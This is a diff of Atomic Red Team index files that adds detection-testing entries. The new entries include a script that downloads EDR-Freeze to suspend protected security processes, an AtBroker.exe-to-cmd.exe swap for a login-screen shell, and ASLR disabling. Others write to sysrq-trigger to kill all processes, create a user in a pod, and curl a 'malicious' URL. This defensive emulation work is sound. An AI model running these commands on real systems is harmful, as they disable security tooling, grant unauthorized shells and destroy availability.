+          1 -ExpandProperty Name\nif (-not $edrFreezeExeName) {\n    Write-Host \"No
+          EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder\" -ForegroundColor
+          Red\n    exit 1\n}\n\n$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName\nWrite-Host
+          \"Using EDR-Freeze executable: $edrFreezeExeName\" -ForegroundColor Cyan\nWrite-Host
+          \"$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)\"
+          -ForegroundColor Yellow\nStart-Process -FilePath $edrFreezeExe -ArgumentList
+          (\"$($process.Id) 15000\") | Out-Null"
+        cleanup_command: |-
+          Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+          Write-Output "File deleted: $edrFreezeExe"
+        name: powershell
+        elevation_required: true
+    - name: Disable ASLR Via sysctl parameters - Linux
+      auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+      description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
+        which disables Address Space Layout Randomization (ASLR) in Linux.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sysctl -w kernel.randomize_va_space=0
+
+          '
+        cleanup_command: 'sysctl -w kernel.randomize_va_space=2
+
+          '
+        name: bash
+        elevation_required: true
   T1601:
     technique:
       type: attack-pattern
@@ -27886,9 +28036,9 @@ defense-evasion:
         command: |
           aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Created ***"
-          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
           echo "*** Log Stream Created ***"
-          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
           echo "*** Log Stream Deleted ***"
           aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
           echo "*** Log Group Deleted ***"
@@ -41979,6 +42129,27 @@ privilege-escalation:
           '
         name: command_prompt
         elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1055.004:
     technique:
       type: attack-pattern
@@ -50837,6 +51008,47 @@ privilege-escalation:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}'
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1055.001:
     technique:
       type: attack-pattern
@@ -58768,6 +58980,47 @@ execution:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}'
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
 persistence:
   T1053.005:
     technique:
@@ -67346,6 +67599,41 @@ persistence:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
         name: powershell
         elevation_required: true
+    - name: Create a Linux user via kubectl in a Pod
+      auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
+      description: |
+        Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+        The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-linux-useradd
+        username:
+          description: Username of the user to create inside the pod
+          type: string
+          default: evil_user
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: alpine
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- sh -lc ''adduser -D #{username} && id #{username}''
+
+          '
   T1176.002:
     technique:
       type: attack-pattern
@@ -68277,6 +68565,27 @@ persistence:
           '
         name: command_prompt
         elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1136.002:
     technique:
       type: attack-pattern
@@ -77478,6 +77787,47 @@ persistence:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}'
+    - name: At - Schedule a job via kubectl in a Pod
+      auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
+      description: |
+        Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
+        and submits a job with `at`. The pod is deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: ubuntu
+        pod_name:
+          description: K8s pod name to execute the command in
+          type: string
+          default: atomic-at-schedule
+        time_spec:
+          description: Time specification of when the command should run
+          type: string
+          default: now + 1 minute
+        at_command:
+          description: The command to be run
+          type: string
+          default: echo Hello from Atomic Red Team
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
+          -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
+          | at #{time_spec} && at -l"
+
+          '
   T1556:
     technique:
       type: attack-pattern
@@ -83714,6 +84064,39 @@ command-and-control:
           Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
         name: powershell
         elevation_required: false
+    - name: Curl Insecure Connection from a Pod
+      auto_generated_guid: 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3
+      description: |
+        Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+        against a target URL. The pod is automatically deleted after execution.
+      supported_platforms:
+      - containers
+      input_arguments:
+        pod_name:
+          description: K8s pod_name to execute the command in
+          type: string
+          default: atomic-insecure-curl
+        remote_url:
+          description: Remote URL to curl
+          type: string
+          default: https://malicious-apt.com
+        image_name:
+          description: Name of the docker image
+          type: string
+          default: curlimages/curl
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: 'echo "kubectl must be installed manually"
+
+          '
+        prereq_command: 'which kubectl
+
+          '
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm
+          -it -- curl -ksL #{remote_url}'
   T1665:
     technique:
       type: attack-pattern
@@ -109664,6 +110047,18 @@ discovery:
           '
         name: command_prompt
         elevation_required: false
+    - name: Identifying Network Shares - Linux
+      auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+      description: |
+        If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+        Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'findmnt -t nfs
+
+          '
+        name: sh
   T1049:
     technique:
       type: attack-pattern
@@ -119893,6 +120288,21 @@ impact:
           '
         name: sh
         elevation_required: true
+    - name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+      auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+      description: 'Adversaries with root or sufficient privileges Send a SIGTERM
+        to all processes, except for init. By writing ''e'' to /proc/sysrq-trigger,
+        they can forced kill all processes, except for init.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "e" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
   T1499.004:
     technique:
       type: attack-pattern
@@ -120606,9 +121016,9 @@ impact:
               - notepad.exe launched with a ransom-themed text file
               - creation of a ransom-themed text file in %TEMP%
             NON-DESTRUCTIVE Atomic Red Team test.
+      dependency_executor_name: command_prompt
       dependencies:
       - description: Notepad must be present on the system
-        dependency_executor_name: command_prompt
         prereq_command: where notepad
         get_prereq_command: ''
       executor:
@@ -124596,7 +125006,47 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1195.002
+    atomic_tests:
+    - name: Simulate npm package installation on a Linux system
+      auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+      description: 'Launches a short‑lived Kubernetes pod using the Node 18 image,
+        initializes a minimal npm project in /tmp/test, and installs the specified
+        npm package without audit/fund/package‑lock options, simulating potentially
+        suspicious package retrieval (e.g., typosquatting/dependency confusion) from
+        within a container. The pod is deleted after execution.
+
+        '
+      supported_platforms:
+      - containers
+      - linux
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: node:18
+        pod_name:
+          description: Name of the pod
+          type: string
+          default: atomic-npm-install
+        package_name:
+          description: NPM package to install
+          type: string
+          default: tinycolor
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: echo "kubectl must be installed"
+        prereq_command: which kubectl
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null
+          2>&1 && echo ''--- package.json before install ---'' && cat package.json
+          && npm install #{package_name} --no-audit --no-fund --no-package-lock &&
+          echo ''--- package.json after install ---'' && cat package.json"
+
+          '
   T1078.002:
     technique:
       type: attack-pattern

atomics/Indexes/linux-index.yaml

@@ -12820,6 +12820,21 @@ defense-evasion:
           | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n"
         name: powershell
         elevation_required: true
+    - name: Disable ASLR Via sysctl parameters - Linux
+      auto_generated_guid: ac333fe1-ce2b-400b-a117-538634427439
+      description: Detects Execution of the `sysctl` command to set `kernel.randomize_va_space=0`
+        which disables Address Space Layout Randomization (ASLR) in Linux.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'sysctl -w kernel.randomize_va_space=0
+
+          '
+        cleanup_command: 'sysctl -w kernel.randomize_va_space=2
+
+          '
+        name: bash
+        elevation_required: true
   T1601:
     technique:
       type: attack-pattern
@@ -62945,6 +62960,18 @@ discovery:
           find . -type f -name ".*"
         cleanup_command: 'rm #{output_file}'
         name: sh
+    - name: Identifying Network Shares - Linux
+      auto_generated_guid: 361fe49d-0c19-46ec-a483-ccb92d38e88e
+      description: |
+        If the system uses network file systems (e.g., NFS, CIFS), findmnt can help locate paths to remote shares.
+        Attackers may then attempt to access these shares for lateral movement or data exfiltration.
+      supported_platforms:
+      - linux
+      executor:
+        command: 'findmnt -t nfs
+
+          '
+        name: sh
   T1049:
     technique:
       type: attack-pattern
@@ -71053,6 +71080,21 @@ impact:
           '
         name: sh
         elevation_required: true
+    - name: Abuse of linux magic system request key for Send a SIGTERM to all processes
+      auto_generated_guid: 6e76f56f-2373-4a6c-a63f-98b7b72761f1
+      description: 'Adversaries with root or sufficient privileges Send a SIGTERM
+        to all processes, except for init. By writing ''e'' to /proc/sysrq-trigger,
+        they can forced kill all processes, except for init.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'echo "e" > /proc/sysrq-trigger
+
+          '
+        name: bash
+        elevation_required: true
   T1499.004:
     technique:
       type: attack-pattern
@@ -74288,7 +74330,47 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
-    atomic_tests: []
+      identifier: T1195.002
+    atomic_tests:
+    - name: Simulate npm package installation on a Linux system
+      auto_generated_guid: a9604672-cd46-493b-b58f-fd4124c22dd3
+      description: 'Launches a short‑lived Kubernetes pod using the Node 18 image,
+        initializes a minimal npm project in /tmp/test, and installs the specified
+        npm package without audit/fund/package‑lock options, simulating potentially
+        suspicious package retrieval (e.g., typosquatting/dependency confusion) from
+        within a container. The pod is deleted after execution.
+
+        '
+      supported_platforms:
+      - containers
+      - linux
+      input_arguments:
+        image_name:
+          description: Name of the image
+          type: string
+          default: node:18
+        pod_name:
+          description: Name of the pod
+          type: string
+          default: atomic-npm-install
+        package_name:
+          description: NPM package to install
+          type: string
+          default: tinycolor
+      dependencies:
+      - description: kubectl must be installed and configured
+        get_prereq_command: echo "kubectl must be installed"
+        prereq_command: which kubectl
+      executor:
+        name: bash
+        elevation_required: false
+        command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
+          --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null
+          2>&1 && echo ''--- package.json before install ---'' && cat package.json
+          && npm install #{package_name} --no-audit --no-fund --no-package-lock &&
+          echo ''--- package.json after install ---'' && cat package.json"
+
+          '
   T1078.002:
     technique:
       type: attack-pattern

atomics/Indexes/macos-index.yaml

@@ -3500,10 +3500,9 @@ defense-evasion:
           type: path
           default: myapp.app
       executor:
-        command: 'sudo xattr -d com.apple.quarantine #{app_path}
+        command: 'xattr -d com.apple.quarantine #{app_path}
 
           '
-        elevation_required: true
         name: sh
   T1553.002:
     technique:
@@ -69035,6 +69034,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/office-365-index.yaml

@@ -62095,6 +62095,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/saas-index.yaml

@@ -61674,6 +61674,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/Indexes/windows-index.yaml

@@ -6667,6 +6667,36 @@ defense-evasion:
           del %temp%\T1140_calc2.txt >nul 2>&1
           del %temp%\T1140_calc2_decoded.exe >nul 2>&1
         name: command_prompt
+    - name: Expand CAB with expand.exe
+      auto_generated_guid: 9f8b1c54-cb76-4d5e-bb1f-2f5c0e8f5a11
+      description: |
+        Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives.
+        Upon success, art-expand-source.txt is extracted next to the CAB.
+      supported_platforms:
+      - windows
+      input_arguments:
+        cab_path:
+          description: Path to the CAB to expand (created if missing)
+          type: path
+          default: "%TEMP%\\art-expand-test.cab"
+        output_dir:
+          description: Destination directory
+          type: path
+          default: "%TEMP%\\art-expand-out"
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: |
+          mkdir "#{output_dir}" >nul 2>&1
+          echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
+          makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
+          pushd "#{output_dir}"
+          expand "#{cab_path}" -F:* .
+          popd
+        cleanup_command: |
+          del "PathToAtomicsFolder\T1140\src\art-expand-source.txt" >nul 2>&1
+          del "#{cab_path}" >nul 2>&1
+          rmdir "#{output_dir}" /s /q >nul 2>&1
   T1562:
     technique:
       type: attack-pattern
@@ -19463,6 +19493,112 @@ defense-evasion:
           -Name Enabled -Value 1 -PropertyType "DWord" -Force
         name: powershell
         elevation_required: true
+    - name: Freeze PPL-protected process with EDR-Freeze
+      auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+      description: This test utilizes the tool EDR-Freeze, which leverages the native
+        Microsoft binary WerFaultSecure.exe to suspend processes protected by the
+        Protected Process Light mechanism. PPL is a Windows security feature designed
+        to safeguard critical system processes — such as those related to antivirus,
+        credential protection, and system integrity — from tampering or inspection.
+        These processes operate in a restricted environment that prevents access even
+        from administrators or debugging tools, unless the accessing tool is signed
+        and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently
+        trusted by the operating system, EDR-Freeze is able to bypass these restrictions
+        and temporarily freeze PPL-protected processes for analysis or testing purposes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        processName:
+          type: string
+          default: SecurityHealthService
+          description: PPL-protected process name to target
+      executor:
+        command: "# Enable SeDebugPrivilege\nAdd-Type -TypeDefinition @\"\nusing System;\nusing
+          System.Runtime.InteropServices;\n\npublic class TokenAdjuster {\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool OpenProcessToken(IntPtr
+          ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool LookupPrivilegeValue(string
+          lpSystemName, string lpName, out long lpLuid);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool AdjustTokenPrivileges(IntPtr
+          TokenHandle, bool DisableAllPrivileges,\n        ref TOKEN_PRIVILEGES NewState,
+          uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);\n\n    [StructLayout(LayoutKind.Sequential,
+          Pack = 1)]\n    public struct TOKEN_PRIVILEGES {\n        public int PrivilegeCount;\n
+          \       public long Luid;\n        public int Attributes;\n    }\n\n    public
+          const int SE_PRIVILEGE_ENABLED = 0x00000002;\n    public const uint TOKEN_ADJUST_PRIVILEGES
+          = 0x0020;\n    public const uint TOKEN_QUERY = 0x0008;\n\n    public static
+          bool EnableSeDebugPrivilege() {\n        IntPtr hToken;\n        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle,
+          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))\n            return
+          false;\n\n        long luid;\n        if (!LookupPrivilegeValue(null, \"SeDebugPrivilege\",
+          out luid))\n            return false;\n\n        TOKEN_PRIVILEGES tp = new
+          TOKEN_PRIVILEGES();\n        tp.PrivilegeCount = 1;\n        tp.Luid = luid;\n
+          \       tp.Attributes = SE_PRIVILEGE_ENABLED;\n\n        return AdjustTokenPrivileges(hToken,
+          false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);\n    }\n}\n\"@\n\n$result =
+          [TokenAdjuster]::EnableSeDebugPrivilege()\nif ($result) {\n    Write-Host
+          \"SeDebugPrivilege enabled successfully.\" -ForegroundColor Green\n} else
+          {\n    Write-Host \"Failed to enable SeDebugPrivilege.\" -ForegroundColor
+          Red\n    exit 1\n}\n\n# Get basic process info\n$process = Get-Process -Name
+          $#{processName} -ErrorAction Stop\n$processName = $process.ProcessName\nWrite-Host
+          \"Process Name: $processName)\"\nWrite-Host \"PID: $($process.Id)\"\n        \n#
+          Get executable path and user info\n$query = \"SELECT * FROM Win32_Process
+          WHERE Name = '$processName.exe'\"\n$wmiProcess = Get-WmiObject -Query $query\n\n$owner
+          = $wmiProcess.GetOwner()\n    Write-Host \"User: $($owner.Domain)\\$($owner.User)\"\n\n\n#
+          Get the folder of the current script\n$scriptFolder = Split-Path -Parent
+          $MyInvocation.MyCommand.Definition\n\n# Download latest EDR-Freeze package
+          and extract (force replace)\n$downloadUrl = \"https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip\"\n$zipPath
+          = Join-Path $scriptFolder \"EDR-Freeze_1.0.zip\"\nWrite-Host \"Downloading
+          latest EDR-Freeze from $downloadUrl\" -ForegroundColor Cyan\ntry {\n    Invoke-WebRequest
+          -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop\n
+          \   Write-Host \"Download completed: $zipPath\" -ForegroundColor Green\n
+          \   $extractFolder = $scriptFolder\n    if (Test-Path $zipPath) {\n        Write-Host
+          \"Extracting archive to $extractFolder (overwriting existing files)\" -ForegroundColor
+          Cyan\n        if (Test-Path $extractFolder) {\n            # Ensure target
+          exe not locked; attempt to stop any running instance silently\n            Get-Process
+          -Name \"EDR-Freeze_1.0\" -ErrorAction SilentlyContinue | Stop-Process -Force
+          -ErrorAction SilentlyContinue\n        }\n        Add-Type -AssemblyName
+          System.IO.Compression.FileSystem 2>$null\n        # Custom extraction routine
+          (overwrite existing) compatible with .NET Framework (no bool overwrite overload)\n
+          \       $archive = $null\n        try {\n            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)\n
+          \           foreach ($entry in $archive.Entries) {\n                if ([string]::IsNullOrWhiteSpace($entry.FullName))
+          { continue }\n                if ($entry.FullName.EndsWith('/')) { # directory
+          entry\n                    $dirPath = Join-Path $extractFolder $entry.FullName\n
+          \                   if (-not (Test-Path $dirPath)) { New-Item -ItemType
+          Directory -Path $dirPath -Force | Out-Null }\n                    continue\n
+          \               }\n                $destPath = Join-Path $extractFolder
+          $entry.FullName\n                $destDir = Split-Path $destPath -Parent\n
+          \               if (-not (Test-Path $destDir)) { New-Item -ItemType Directory
+          -Path $destDir -Force | Out-Null }\n                if (Test-Path $destPath)
+          { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }\n                try
+          {\n                    # Use static extension method (PowerShell 5.1 compatible)\n
+          \                   [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry,
+          $destPath, $false)\n                } catch {\n                    Write-Host
+          \"Failed to extract entry $($entry.FullName): $_\" -ForegroundColor Yellow\n
+          \               }\n            }\n            Write-Host \"Extraction completed.\"
+          -ForegroundColor Green\n        } finally {\n            if ($archive) {
+          $archive.Dispose() }\n        }\n    }\n} catch {\n    Write-Host \"Failed
+          to download or extract EDR-Freeze: $_\" -ForegroundColor Red\n}\n\n# Wait
+          15s before putting targeted process before putting it in the comma\nWrite-Host
+          \"Waiting 15s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 5\nWrite-Host \"Waiting 10s before putting
+          $processName in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds
+          5\nWrite-Host \"Waiting 5s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 3\nWrite-Host \"Waiting 2s before putting $processName
+          in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds 2\n\n# Put
+          targeted  process in the comma for 15s\n# Discover the EDR-Freeze executable
+          dynamically (pick most recent if multiple)\n$edrFreezeExeName = Get-ChildItem
+          -Path $scriptFolder -Filter 'EDR-Freeze_*.exe' -ErrorAction SilentlyContinue
+          |\n    Sort-Object LastWriteTime -Descending |\n    Select-Object -First
+          1 -ExpandProperty Name\nif (-not $edrFreezeExeName) {\n    Write-Host \"No
+          EDR-Freeze executable (EDR-Freeze_*.exe) found in $scriptFolder\" -ForegroundColor
+          Red\n    exit 1\n}\n\n$edrFreezeExe = Join-Path $scriptFolder $edrFreezeExeName\nWrite-Host
+          \"Using EDR-Freeze executable: $edrFreezeExeName\" -ForegroundColor Cyan\nWrite-Host
+          \"$processName putted in the comma for 15s, by targetting Process ID $($htaProcess.Id)\"
+          -ForegroundColor Yellow\nStart-Process -FilePath $edrFreezeExe -ArgumentList
+          (\"$($process.Id) 15000\") | Out-Null"
+        cleanup_command: |-
+          Remove-Item -Path $edrFreezeExe -Force -erroraction silentlycontinue
+          Write-Output "File deleted: $edrFreezeExe"
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       type: attack-pattern
@@ -34986,6 +35122,27 @@ privilege-escalation:
           '
         name: command_prompt
         elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1055.004:
     technique:
       type: attack-pattern
@@ -57070,6 +57227,27 @@ persistence:
           '
         name: command_prompt
         elevation_required: true
+    - name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
+      auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
+      description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
+        allows the user to launch an elevated command prompt from the login screen
+        by locking and then unlocking the computer after toggling on any of the accessibility
+        tools in the Accessibility menu.
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
+          takeown /F C:\Windows\System32\AtBroker.exe /A
+          icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
+          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
+        cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
+
+          '
+        name: command_prompt
+        elevation_required: true
   T1136.002:
     technique:
       type: attack-pattern
@@ -99701,9 +99879,9 @@ impact:
               - notepad.exe launched with a ransom-themed text file
               - creation of a ransom-themed text file in %TEMP%
             NON-DESTRUCTIVE Atomic Red Team test.
+      dependency_executor_name: command_prompt
       dependencies:
       - description: Notepad must be present on the system
-        dependency_executor_name: command_prompt
         prereq_command: where notepad
         get_prereq_command: ''
       executor:
@@ -103025,6 +103203,7 @@ initial-access:
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Metadata'
+      identifier: T1195.002
     atomic_tests: []
   T1078.002:
     technique:

atomics/T1053.002/T1053.002.md

